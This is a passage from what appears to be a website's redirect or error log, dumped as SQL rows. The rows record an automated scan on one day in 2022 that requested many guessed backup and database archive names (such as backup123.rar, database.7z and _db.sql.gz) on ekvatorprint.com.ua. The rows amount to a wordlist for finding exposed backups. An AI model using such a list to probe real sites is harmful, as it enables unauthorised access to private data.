00:00:00',301),(21665,'https://ekvatorprint.com.ua/backup123.bz2',NULL,'','',1,0,'2022-03-23 11:19:18','0000-00-00 00:00:00',301),(21666,'https://ekvatorprint.com.ua/backup123.rar',NULL,'','',2,0,'2022-03-23 11:19:18','0000-00-00 00:00:00',301),(21667,'https://ekvatorprint.com.ua/backup123.bak',NULL,'','',1,0,'2022-03-23 11:19:18','0000-00-00 00:00:00',301),(21668,'https://ekvatorprint.com.ua/backup123.zip',NULL,'','',1,0,'2022-03-23 11:19:19','0000-00-00 00:00:00',301),(21669,'https://ekvatorprint.com.ua/backup123.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:19','0000-00-00 00:00:00',301),(21670,'https://ekvatorprint.com.ua/backup123.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:19','0000-00-00 00:00:00',301),(21671,'https://ekvatorprint.com.ua/backup123.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:20','0000-00-00 00:00:00',301),(21672,'https://ekvatorprint.com.ua/backup123.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:20','0000-00-00 00:00:00',301),(21673,'https://ekvatorprint.com.ua/backup123.7z',NULL,'','',1,0,'2022-03-23 11:19:20','0000-00-00 00:00:00',301),(21674,'https://ekvatorprint.com.ua/backup123.gz',NULL,'','',1,0,'2022-03-23 11:19:21','0000-00-00 00:00:00',301),(21675,'https://ekvatorprint.com.ua/dev.sql',NULL,'','',1,0,'2022-03-23 11:19:21','0000-00-00 00:00:00',301),(21676,'https://ekvatorprint.com.ua/dev.tar',NULL,'','',1,0,'2022-03-23 11:19:21','0000-00-00 00:00:00',301),(21677,'https://ekvatorprint.com.ua/dev.bz2',NULL,'','',1,0,'2022-03-23 11:19:22','0000-00-00 00:00:00',301),(21678,'https://ekvatorprint.com.ua/dev.rar',NULL,'','',2,0,'2022-03-23 11:19:22','0000-00-00 00:00:00',301),(21679,'https://ekvatorprint.com.ua/dev.bak',NULL,'','',1,0,'2022-03-23 11:19:22','0000-00-00 00:00:00',301),(21680,'https://ekvatorprint.com.ua/dev.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:23','0000-00-00 00:00:00',301),(21681,'https://ekvatorprint.com.ua/dev.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:23','0000-00-00 00:00:00',301),(21682,'https://ekvatorprint.com.ua/dev.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:23','0000-00-00 00:00:00',301),(21683,'https://ekvatorprint.com.ua/dev.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:24','0000-00-00 00:00:00',301),(21684,'https://ekvatorprint.com.ua/dev.7z',NULL,'','',1,0,'2022-03-23 11:19:24','0000-00-00 00:00:00',301),(21685,'https://ekvatorprint.com.ua/dev.gz',NULL,'','',1,0,'2022-03-23 11:19:24','0000-00-00 00:00:00',301),(21686,'https://ekvatorprint.com.ua/developer.bz2',NULL,'','',1,0,'2022-03-23 11:19:25','0000-00-00 00:00:00',301),(21687,'https://ekvatorprint.com.ua/developer.bak',NULL,'','',1,0,'2022-03-23 11:19:26','0000-00-00 00:00:00',301),(21688,'https://ekvatorprint.com.ua/developer.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:27','0000-00-00 00:00:00',301),(21689,'https://ekvatorprint.com.ua/developer.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:27','0000-00-00 00:00:00',301),(21690,'https://ekvatorprint.com.ua/developer.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:28','0000-00-00 00:00:00',301),(21691,'https://ekvatorprint.com.ua/developer.7z',NULL,'','',1,0,'2022-03-23 11:19:28','0000-00-00 00:00:00',301),(21692,'https://ekvatorprint.com.ua/developer.gz',NULL,'','',1,0,'2022-03-23 11:19:29','0000-00-00 00:00:00',301),(21693,'https://ekvatorprint.com.ua/develop.sql',NULL,'','',1,0,'2022-03-23 11:19:29','0000-00-00 00:00:00',301),(21694,'https://ekvatorprint.com.ua/develop.tar',NULL,'','',1,0,'2022-03-23 11:19:29','0000-00-00 00:00:00',301),(21695,'https://ekvatorprint.com.ua/develop.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:29','0000-00-00 00:00:00',301),(21696,'https://ekvatorprint.com.ua/develop.bz2',NULL,'','',1,0,'2022-03-23 11:19:30','0000-00-00 00:00:00',301),(21697,'https://ekvatorprint.com.ua/develop.rar',NULL,'','',2,0,'2022-03-23 11:19:30','0000-00-00 00:00:00',301),(21698,'https://ekvatorprint.com.ua/develop.bak',NULL,'','',1,0,'2022-03-23 11:19:30','0000-00-00 00:00:00',301),(21699,'https://ekvatorprint.com.ua/develop.zip',NULL,'','',1,0,'2022-03-23 11:19:31','0000-00-00 00:00:00',301),(21700,'https://ekvatorprint.com.ua/develop.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:31','0000-00-00 00:00:00',301),(21701,'https://ekvatorprint.com.ua/develop.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:31','0000-00-00 00:00:00',301),(21702,'https://ekvatorprint.com.ua/develop.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:31','0000-00-00 00:00:00',301),(21703,'https://ekvatorprint.com.ua/develop.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:32','0000-00-00 00:00:00',301),(21704,'https://ekvatorprint.com.ua/develop.7z',NULL,'','',1,0,'2022-03-23 11:19:32','0000-00-00 00:00:00',301),(21705,'https://ekvatorprint.com.ua/develop.gz',NULL,'','',1,0,'2022-03-23 11:19:33','0000-00-00 00:00:00',301),(21706,'https://ekvatorprint.com.ua/admin.bz2',NULL,'','',1,0,'2022-03-23 11:19:34','0000-00-00 00:00:00',301),(21707,'https://ekvatorprint.com.ua/admin.bak',NULL,'','',1,0,'2022-03-23 11:19:34','0000-00-00 00:00:00',301),(21708,'https://ekvatorprint.com.ua/admin.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:35','0000-00-00 00:00:00',301),(21709,'https://ekvatorprint.com.ua/admin.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:35','0000-00-00 00:00:00',301),(21710,'https://ekvatorprint.com.ua/admin.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:35','0000-00-00 00:00:00',301),(21711,'https://ekvatorprint.com.ua/admin.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:35','0000-00-00 00:00:00',301),(21712,'https://ekvatorprint.com.ua/admin.7z',NULL,'','',1,0,'2022-03-23 11:19:36','0000-00-00 00:00:00',301),(21713,'https://ekvatorprint.com.ua/admin.gz',NULL,'','',1,0,'2022-03-23 11:19:36','0000-00-00 00:00:00',301),(21714,'https://ekvatorprint.com.ua/manager.sql',NULL,'','',1,0,'2022-03-23 11:19:36','0000-00-00 00:00:00',301),(21715,'https://ekvatorprint.com.ua/manager.tar',NULL,'','',1,0,'2022-03-23 11:19:37','0000-00-00 00:00:00',301),(21716,'https://ekvatorprint.com.ua/manager.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:37','0000-00-00 00:00:00',301),(21717,'https://ekvatorprint.com.ua/manager.bz2',NULL,'','',1,0,'2022-03-23 11:19:37','0000-00-00 00:00:00',301),(21718,'https://ekvatorprint.com.ua/manager.rar',NULL,'','',2,0,'2022-03-23 11:19:37','0000-00-00 00:00:00',301),(21719,'https://ekvatorprint.com.ua/manager.bak',NULL,'','',1,0,'2022-03-23 11:19:38','0000-00-00 00:00:00',301),(21720,'https://ekvatorprint.com.ua/manager.zip',NULL,'','',1,0,'2022-03-23 11:19:38','0000-00-00 00:00:00',301),(21721,'https://ekvatorprint.com.ua/manager.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:38','0000-00-00 00:00:00',301),(21722,'https://ekvatorprint.com.ua/manager.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:38','0000-00-00 00:00:00',301),(21723,'https://ekvatorprint.com.ua/manager.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:39','0000-00-00 00:00:00',301),(21724,'https://ekvatorprint.com.ua/manager.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:39','0000-00-00 00:00:00',301),(21725,'https://ekvatorprint.com.ua/manager.7z',NULL,'','',1,0,'2022-03-23 11:19:39','0000-00-00 00:00:00',301),(21726,'https://ekvatorprint.com.ua/manager.gz',NULL,'','',1,0,'2022-03-23 11:19:40','0000-00-00 00:00:00',301),(21727,'https://ekvatorprint.com.ua/manage.sql',NULL,'','',1,0,'2022-03-23 11:19:40','0000-00-00 00:00:00',301),(21728,'https://ekvatorprint.com.ua/manage.tar',NULL,'','',1,0,'2022-03-23 11:19:40','0000-00-00 00:00:00',301),(21729,'https://ekvatorprint.com.ua/manage.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:41','0000-00-00 00:00:00',301),(21730,'https://ekvatorprint.com.ua/manage.bz2',NULL,'','',1,0,'2022-03-23 11:19:41','0000-00-00 00:00:00',301),(21731,'https://ekvatorprint.com.ua/manage.rar',NULL,'','',2,0,'2022-03-23 11:19:41','0000-00-00 00:00:00',301),(21732,'https://ekvatorprint.com.ua/manage.bak',NULL,'','',1,0,'2022-03-23 11:19:41','0000-00-00 00:00:00',301),(21733,'https://ekvatorprint.com.ua/manage.zip',NULL,'','',1,0,'2022-03-23 11:19:42','0000-00-00 00:00:00',301),(21734,'https://ekvatorprint.com.ua/manage.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:42','0000-00-00 00:00:00',301),(21735,'https://ekvatorprint.com.ua/manage.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:42','0000-00-00 00:00:00',301),(21736,'https://ekvatorprint.com.ua/manage.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:43','0000-00-00 00:00:00',301),(21737,'https://ekvatorprint.com.ua/manage.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:43','0000-00-00 00:00:00',301),(21738,'https://ekvatorprint.com.ua/manage.7z',NULL,'','',1,0,'2022-03-23 11:19:43','0000-00-00 00:00:00',301),(21739,'https://ekvatorprint.com.ua/manage.gz',NULL,'','',1,0,'2022-03-23 11:19:44','0000-00-00 00:00:00',301),(21740,'https://ekvatorprint.com.ua/administrator.sql',NULL,'','',1,0,'2022-03-23 11:19:44','0000-00-00 00:00:00',301),(21741,'https://ekvatorprint.com.ua/administrator.tar',NULL,'','',1,0,'2022-03-23 11:19:44','0000-00-00 00:00:00',301),(21742,'https://ekvatorprint.com.ua/administrator.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:44','0000-00-00 00:00:00',301),(21743,'https://ekvatorprint.com.ua/administrator.bz2',NULL,'','',1,0,'2022-03-23 11:19:45','0000-00-00 00:00:00',301),(21744,'https://ekvatorprint.com.ua/administrator.rar',NULL,'','',2,0,'2022-03-23 11:19:45','0000-00-00 00:00:00',301),(21745,'https://ekvatorprint.com.ua/administrator.bak',NULL,'','',1,0,'2022-03-23 11:19:45','0000-00-00 00:00:00',301),(21746,'https://ekvatorprint.com.ua/administrator.zip',NULL,'','',1,0,'2022-03-23 11:19:45','0000-00-00 00:00:00',301),(21747,'https://ekvatorprint.com.ua/administrator.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:46','0000-00-00 00:00:00',301),(21748,'https://ekvatorprint.com.ua/administrator.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:46','0000-00-00 00:00:00',301),(21749,'https://ekvatorprint.com.ua/administrator.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:46','0000-00-00 00:00:00',301),(21750,'https://ekvatorprint.com.ua/administrator.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:46','0000-00-00 00:00:00',301),(21751,'https://ekvatorprint.com.ua/administrator.7z',NULL,'','',1,0,'2022-03-23 11:19:47','0000-00-00 00:00:00',301),(21752,'https://ekvatorprint.com.ua/administrator.gz',NULL,'','',1,0,'2022-03-23 11:19:47','0000-00-00 00:00:00',301),(21753,'https://ekvatorprint.com.ua/data.sql',NULL,'','',3,0,'2022-03-23 11:19:47','0000-00-00 00:00:00',301),(21754,'https://ekvatorprint.com.ua/data.bz2',NULL,'','',1,0,'2022-03-23 11:19:48','0000-00-00 00:00:00',301),(21755,'https://ekvatorprint.com.ua/data.rar',NULL,'','',2,0,'2022-03-23 11:19:48','0000-00-00 00:00:00',301),(21756,'https://ekvatorprint.com.ua/data.bak',NULL,'','',1,0,'2022-03-23 11:19:48','0000-00-00 00:00:00',301),(21757,'https://ekvatorprint.com.ua/data.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:49','0000-00-00 00:00:00',301),(21758,'https://ekvatorprint.com.ua/data.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:49','0000-00-00 00:00:00',301),(21759,'https://ekvatorprint.com.ua/data.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:49','0000-00-00 00:00:00',301),(21760,'https://ekvatorprint.com.ua/data.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:50','0000-00-00 00:00:00',301),(21761,'https://ekvatorprint.com.ua/data.7z',NULL,'','',1,0,'2022-03-23 11:19:50','0000-00-00 00:00:00',301),(21762,'https://ekvatorprint.com.ua/data.gz',NULL,'','',1,0,'2022-03-23 11:19:50','0000-00-00 00:00:00',301),(21763,'https://ekvatorprint.com.ua/database.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:51','0000-00-00 00:00:00',301),(21764,'https://ekvatorprint.com.ua/database.bz2',NULL,'','',4,0,'2022-03-23 11:19:51','0000-00-00 00:00:00',301),(21765,'https://ekvatorprint.com.ua/database.rar',NULL,'','',8,0,'2022-03-23 11:19:52','0000-00-00 00:00:00',301),(21766,'https://ekvatorprint.com.ua/database.bak',NULL,'','',5,0,'2022-03-23 11:19:52','0000-00-00 00:00:00',301),(21767,'https://ekvatorprint.com.ua/database.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:53','0000-00-00 00:00:00',301),(21768,'https://ekvatorprint.com.ua/database.7z',NULL,'','',6,0,'2022-03-23 11:19:54','0000-00-00 00:00:00',301),(21769,'https://ekvatorprint.com.ua/_db.sql',NULL,'','',2,0,'2022-03-23 11:19:54','0000-00-00 00:00:00',301),(21770,'https://ekvatorprint.com.ua/_db.tar',NULL,'','',2,0,'2022-03-23 11:19:55','0000-00-00 00:00:00',301),(21771,'https://ekvatorprint.com.ua/_db.tar.gz',NULL,'','',2,0,'2022-03-23 11:19:55','0000-00-00 00:00:00',301),(21772,'https://ekvatorprint.com.ua/_db.bz2',NULL,'','',2,0,'2022-03-23 11:19:55','0000-00-00 00:00:00',301),(21773,'https://ekvatorprint.com.ua/_db.rar',NULL,'','',4,0,'2022-03-23 11:19:55','0000-00-00 00:00:00',301),(21774,'https://ekvatorprint.com.ua/_db.bak',NULL,'','',2,0,'2022-03-23 11:19:56','0000-00-00 00:00:00',301),(21775,'https://ekvatorprint.com.ua/_db.zip',NULL,'','',2,0,'2022-03-23 11:19:56','0000-00-00 00:00:00',301),(21776,'https://ekvatorprint.com.ua/_db.sql.gz',NULL,'','',2,0,'2022-03-23 11:19:56','0000-00-00 00:00:00',301),(21777,'https://ekvatorprint.com.ua/_db.sql.zip',NULL,'','',2,0,'2022-03-23 11:19:56','0000-00-00 00:00:00',301),(21778,'https://ekvatorprint.com.ua/_db.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:19:57','0000-00-00 00:00:00',301),(21779,'https://ekvatorprint.com.ua/_db.sql.tar',NULL,'','',2,0,'2022-03-23 11:19:57','0000-00-00 00:00:00',301),(21780,'https://ekvatorprint.com.ua/_db.7z',NULL,'','',2,0,'2022-03-23 11:19:57','0000-00-00 00:00:00',301),(21781,'https://ekvatorprint.com.ua/_db.gz',NULL,'','',2,0,'2022-03-23 11:19:58','0000-00-00 00:00:00',301),(21782,'https://ekvatorprint.com.ua/_data.sql',NULL,'','',1,0,'2022-03-23 11:19:58','0000-00-00 00:00:00',301),(21783,'https://ekvatorprint.com.ua/_data.tar',NULL,'','',1,0,'2022-03-23 11:19:58','0000-00-00 00:00:00',301),(21784,'https://ekvatorprint.com.ua/_data.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:58','0000-00-00 00:00:00',301),(21785,'https://ekvatorprint.com.ua/_data.bz2',NULL,'','',1,0,'2022-03-23 11:19:59','0000-00-00 00:00:00',301),(21786,'https://ekvatorprint.com.ua/_data.rar',NULL,'','',2,0,'2022-03-23 11:19:59','0000-00-00 00:00:00',301),(21787,'https://ekvatorprint.com.ua/_data.bak',NULL,'','',1,0,'2022-03-23 11:19:59','0000-00-00 00:00:00',301),(21788,'https://ekvatorprint.com.ua/_data.zip',NULL,'','',1,0,'2022-03-23 11:19:59','0000-00-00 00:00:00',301),(21789,'https://ekvatorprint.com.ua/_data.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:00','0000-00-00 00:00:00',301),(21790,'https://ekvatorprint.com.ua/_data.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:00','0000-00-00 00:00:00',301),(21791,'https://ekvatorprint.com.ua/_data.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:00','0000-00-00 00:00:00',301),(21792,'https://ekvatorprint.com.ua/_data.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:01','0000-00-00 00:00:00',301),(21793,'https://ekvatorprint.com.ua/_data.7z',NULL,'','',1,0,'2022-03-23 11:20:01','0000-00-00 00:00:00',301),(21794,'https://ekvatorprint.com.ua/_data.gz',NULL,'','',1,0,'2022-03-23 11:20:02','0000-00-00 00:00:00',301),(21795,'https://ekvatorprint.com.ua/full_data.sql',NULL,'','',1,0,'2022-03-23 11:20:02','0000-00-00 00:00:00',301),(21796,'https://ekvatorprint.com.ua/full_data.tar',NULL,'','',1,0,'2022-03-23 11:20:02','0000-00-00 00:00:00',301),(21797,'https://ekvatorprint.com.ua/full_data.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:03','0000-00-00 00:00:00',301),(21798,'https://ekvatorprint.com.ua/full_data.bz2',NULL,'','',1,0,'2022-03-23 11:20:03','0000-00-00 00:00:00',301),(21799,'https://ekvatorprint.com.ua/full_data.rar',NULL,'','',2,0,'2022-03-23 11:20:03','0000-00-00 00:00:00',301),(21800,'https://ekvatorprint.com.ua/full_data.bak',NULL,'','',1,0,'2022-03-23 11:20:04','0000-00-00 00:00:00',301),(21801,'https://ekvatorprint.com.ua/full_data.zip',NULL,'','',1,0,'2022-03-23 11:20:04','0000-00-00 00:00:00',301),(21802,'https://ekvatorprint.com.ua/full_data.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:04','0000-00-00 00:00:00',301),(21803,'https://ekvatorprint.com.ua/full_data.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:04','0000-00-00 00:00:00',301),(21804,'https://ekvatorprint.com.ua/full_data.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:05','0000-00-00 00:00:00',301),(21805,'https://ekvatorprint.com.ua/full_data.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:05','0000-00-00 00:00:00',301),(21806,'https://ekvatorprint.com.ua/full_data.7z',NULL,'','',1,0,'2022-03-23 11:20:06','0000-00-00 00:00:00',301),(21807,'https://ekvatorprint.com.ua/full_data.gz',NULL,'','',1,0,'2022-03-23 11:20:06','0000-00-00 00:00:00',301),(21808,'https://ekvatorprint.com.ua/-db.sql',NULL,'','',1,0,'2022-03-23 11:20:11','0000-00-00 00:00:00',301),(21809,'https://ekvatorprint.com.ua/-db.tar',NULL,'','',1,0,'2022-03-23 11:20:11','0000-00-00 00:00:00',301),(21810,'https://ekvatorprint.com.ua/-db.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:12','0000-00-00 00:00:00',301),(21811,'https://ekvatorprint.com.ua/-db.bz2',NULL,'','',1,0,'2022-03-23 11:20:12','0000-00-00 00:00:00',301),(21812,'https://ekvatorprint.com.ua/-db.rar',NULL,'','',2,0,'2022-03-23 11:20:12','0000-00-00 00:00:00',301),(21813,'https://ekvatorprint.com.ua/-db.bak',NULL,'','',1,0,'2022-03-23 11:20:13','0000-00-00 00:00:00',301),(21814,'https://ekvatorprint.com.ua/-db.zip',NULL,'','',1,0,'2022-03-23 11:20:13','0000-00-00 00:00:00',301),(21815,'https://ekvatorprint.com.ua/-db.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:13','0000-00-00 00:00:00',301),(21816,'https://ekvatorprint.com.ua/-db.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:14','0000-00-00 00:00:00',301),(21817,'https://ekvatorprint.com.ua/-db.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:14','0000-00-00 00:00:00',301),(21818,'https://ekvatorprint.com.ua/-db.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:15','0000-00-00 00:00:00',301),(21819,'https://ekvatorprint.com.ua/-db.7z',NULL,'','',1,0,'2022-03-23 11:20:15','0000-00-00 00:00:00',301),(21820,'https://ekvatorprint.com.ua/-db.gz',NULL,'','',1,0,'2022-03-23 11:20:15','0000-00-00 00:00:00',301),(21821,'https://ekvatorprint.com.ua/dbs.sql',NULL,'','',1,0,'2022-03-23 11:20:16','0000-00-00 00:00:00',301),(21822,'https://ekvatorprint.com.ua/dbs.tar',NULL,'','',1,0,'2022-03-23 11:20:16','0000-00-00 00:00:00',301),(21823,'https://ekvatorprint.com.ua/dbs.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:16','0000-00-00 00:00:00',301),(21824,'https://ekvatorprint.com.ua/dbs.bz2',NULL,'','',1,0,'2022-03-23 11:20:16','0000-00-00 00:00:00',301),(21825,'https://ekvatorprint.com.ua/dbs.rar',NULL,'','',2,0,'2022-03-23 11:20:16','0000-00-00 00:00:00',301),(21826,'https://ekvatorprint.com.ua/dbs.bak',NULL,'','',1,0,'2022-03-23 11:20:17','0000-00-00 00:00:00',301),(21827,'https://ekvatorprint.com.ua/dbs.zip',NULL,'','',1,0,'2022-03-23 11:20:17','0000-00-00 00:00:00',301),(21828,'https://ekvatorprint.com.ua/dbs.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:17','0000-00-00 00:00:00',301),(21829,'https://ekvatorprint.com.ua/dbs.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:18','0000-00-00 00:00:00',301),(21830,'https://ekvatorprint.com.ua/dbs.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:18','0000-00-00 00:00:00',301),(21831,'https://ekvatorprint.com.ua/dbs.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:18','0000-00-00 00:00:00',301),(21832,'https://ekvatorprint.com.ua/dbs.7z',NULL,'','',1,0,'2022-03-23 11:20:19','0000-00-00 00:00:00',301),(21833,'https://ekvatorprint.com.ua/dbs.gz',NULL,'','',1,0,'2022-03-23 11:20:19','0000-00-00 00:00:00',301),(21834,'https://ekvatorprint.com.ua/-dbs.sql',NULL,'','',1,0,'2022-03-23 11:20:19','0000-00-00 00:00:00',301),(21835,'https://ekvatorprint.com.ua/-dbs.tar',NULL,'','',1,0,'2022-03-23 11:20:19','0000-00-00 00:00:00',301),(21836,'https://ekvatorprint.com.ua/-dbs.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:19','0000-00-00 00:00:00',301),(21837,'https://ekvatorprint.com.ua/-dbs.bz2',NULL,'','',1,0,'2022-03-23 11:20:20','0000-00-00 00:00:00',301),(21838,'https://ekvatorprint.com.ua/-dbs.rar',NULL,'','',2,0,'2022-03-23 11:20:20','0000-00-00 00:00:00',301),(21839,'https://ekvatorprint.com.ua/-dbs.bak',NULL,'','',1,0,'2022-03-23 11:20:20','0000-00-00 00:00:00',301),(21840,'https://ekvatorprint.com.ua/-dbs.zip',NULL,'','',1,0,'2022-03-23 11:20:20','0000-00-00 00:00:00',301),(21841,'https://ekvatorprint.com.ua/-dbs.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:21','0000-00-00 00:00:00',301),(21842,'https://ekvatorprint.com.ua/-dbs.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:21','0000-00-00 00:00:00',301),(21843,'https://ekvatorprint.com.ua/-dbs.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:21','0000-00-00 00:00:00',301),(21844,'https://ekvatorprint.com.ua/-dbs.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:21','0000-00-00 00:00:00',301),(21845,'https://ekvatorprint.com.ua/-dbs.7z',NULL,'','',1,0,'2022-03-23 11:20:22','0000-00-00 00:00:00',301),(21846,'https://ekvatorprint.com.ua/-dbs.gz',NULL,'','',1,0,'2022-03-23 11:20:22','0000-00-00 00:00:00',301),(21847,'https://ekvatorprint.com.ua/db_.sql',NULL,'','',1,0,'2022-03-23 11:20:26','0000-00-00 00:00:00',301),(21848,'https://ekvatorprint.com.ua/db_.tar',NULL,'','',1,0,'2022-03-23 11:20:26','0000-00-00 00:00:00',301),(21849,'https://ekvatorprint.com.ua/db_.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:26','0000-00-00 00:00:00',301),(21850,'https://ekvatorprint.com.ua/db_.bz2',NULL,'','',1,0,'2022-03-23 11:20:27','0000-00-00 00:00:00',301),(21851,'https://ekvatorprint.com.ua/db_.rar',NULL,'','',2,0,'2022-03-23 11:20:27','0000-00-00 00:00:00',301),(21852,'https://ekvatorprint.com.ua/db_.bak',NULL,'','',1,0,'2022-03-23 11:20:27','0000-00-00 00:00:00',301),(21853,'https://ekvatorprint.com.ua/db_.zip',NULL,'','',1,0,'2022-03-23 11:20:27','0000-00-00 00:00:00',301),(21854,'https://ekvatorprint.com.ua/db_.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:28','0000-00-00 00:00:00',301),(21855,'https://ekvatorprint.com.ua/db_.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:28','0000-00-00 00:00:00',301),(21856,'https://ekvatorprint.com.ua/db_.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:28','0000-00-00 00:00:00',301),(21857,'https://ekvatorprint.com.ua/db_.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:28','0000-00-00 00:00:00',301),(21858,'https://ekvatorprint.com.ua/db_.7z',NULL,'','',1,0,'2022-03-23 11:20:29','0000-00-00 00:00:00',301),(21859,'https://ekvatorprint.com.ua/db_.gz',NULL,'','',1,0,'2022-03-23 11:20:29','0000-00-00 00:00:00',301),(21860,'https://ekvatorprint.com.ua/dev1.sql',NULL,'','',1,0,'2022-03-23 11:20:29','0000-00-00 00:00:00',301),(21861,'https://ekvatorprint.com.ua/dev1.tar',NULL,'','',1,0,'2022-03-23 11:20:30','0000-00-00 00:00:00',301),(21862,'https://ekvatorprint.com.ua/dev1.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:30','0000-00-00 00:00:00',301),(21863,'https://ekvatorprint.com.ua/dev1.bz2',NULL,'','',1,0,'2022-03-23 11:20:30','0000-00-00 00:00:00',301),(21864,'https://ekvatorprint.com.ua/dev1.rar',NULL,'','',2,0,'2022-03-23 11:20:31','0000-00-00 00:00:00',301),(21865,'https://ekvatorprint.com.ua/dev1.bak',NULL,'','',1,0,'2022-03-23 11:20:31','0000-00-00 00:00:00',301),(21866,'https://ekvatorprint.com.ua/dev1.zip',NULL,'','',1,0,'2022-03-23 11:20:31','0000-00-00 00:00:00',301),(21867,'https://ekvatorprint.com.ua/dev1.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:31','0000-00-00 00:00:00',301),(21868,'https://ekvatorprint.com.ua/dev1.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:32','0000-00-00 00:00:00',301),(21869,'https://ekvatorprint.com.ua/dev1.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:32','0000-00-00 00:00:00',301),(21870,'https://ekvatorprint.com.ua/dev1.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:32','0000-00-00 00:00:00',301),(21871,'https://ekvatorprint.com.ua/dev1.7z',NULL,'','',1,0,'2022-03-23 11:20:33','0000-00-00 00:00:00',301),(21872,'https://ekvatorprint.com.ua/dev1.gz',NULL,'','',1,0,'2022-03-23 11:20:33','0000-00-00 00:00:00',301),(21873,'https://ekvatorprint.com.ua/dev123.sql',NULL,'','',1,0,'2022-03-23 11:20:33','0000-00-00 00:00:00',301),(21874,'https://ekvatorprint.com.ua/dev123.tar',NULL,'','',1,0,'2022-03-23 11:20:33','0000-00-00 00:00:00',301),(21875,'https://ekvatorprint.com.ua/dev123.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:34','0000-00-00 00:00:00',301),(21876,'https://ekvatorprint.com.ua/dev123.bz2',NULL,'','',1,0,'2022-03-23 11:20:34','0000-00-00 00:00:00',301),(21877,'https://ekvatorprint.com.ua/dev123.rar',NULL,'','',2,0,'2022-03-23 11:20:34','0000-00-00 00:00:00',301),(21878,'https://ekvatorprint.com.ua/dev123.bak',NULL,'','',1,0,'2022-03-23 11:20:34','0000-00-00 00:00:00',301),(21879,'https://ekvatorprint.com.ua/dev123.zip',NULL,'','',1,0,'2022-03-23 11:20:35','0000-00-00 00:00:00',301),(21880,'https://ekvatorprint.com.ua/dev123.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:35','0000-00-00 00:00:00',301),(21881,'https://ekvatorprint.com.ua/dev123.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:35','0000-00-00 00:00:00',301),(21882,'https://ekvatorprint.com.ua/dev123.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:35','0000-00-00 00:00:00',301),(21883,'https://ekvatorprint.com.ua/dev123.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:36','0000-00-00 00:00:00',301),(21884,'https://ekvatorprint.com.ua/dev123.7z',NULL,'','',1,0,'2022-03-23 11:20:36','0000-00-00 00:00:00',301),(21885,'https://ekvatorprint.com.ua/dev123.gz',NULL,'','',1,0,'2022-03-23 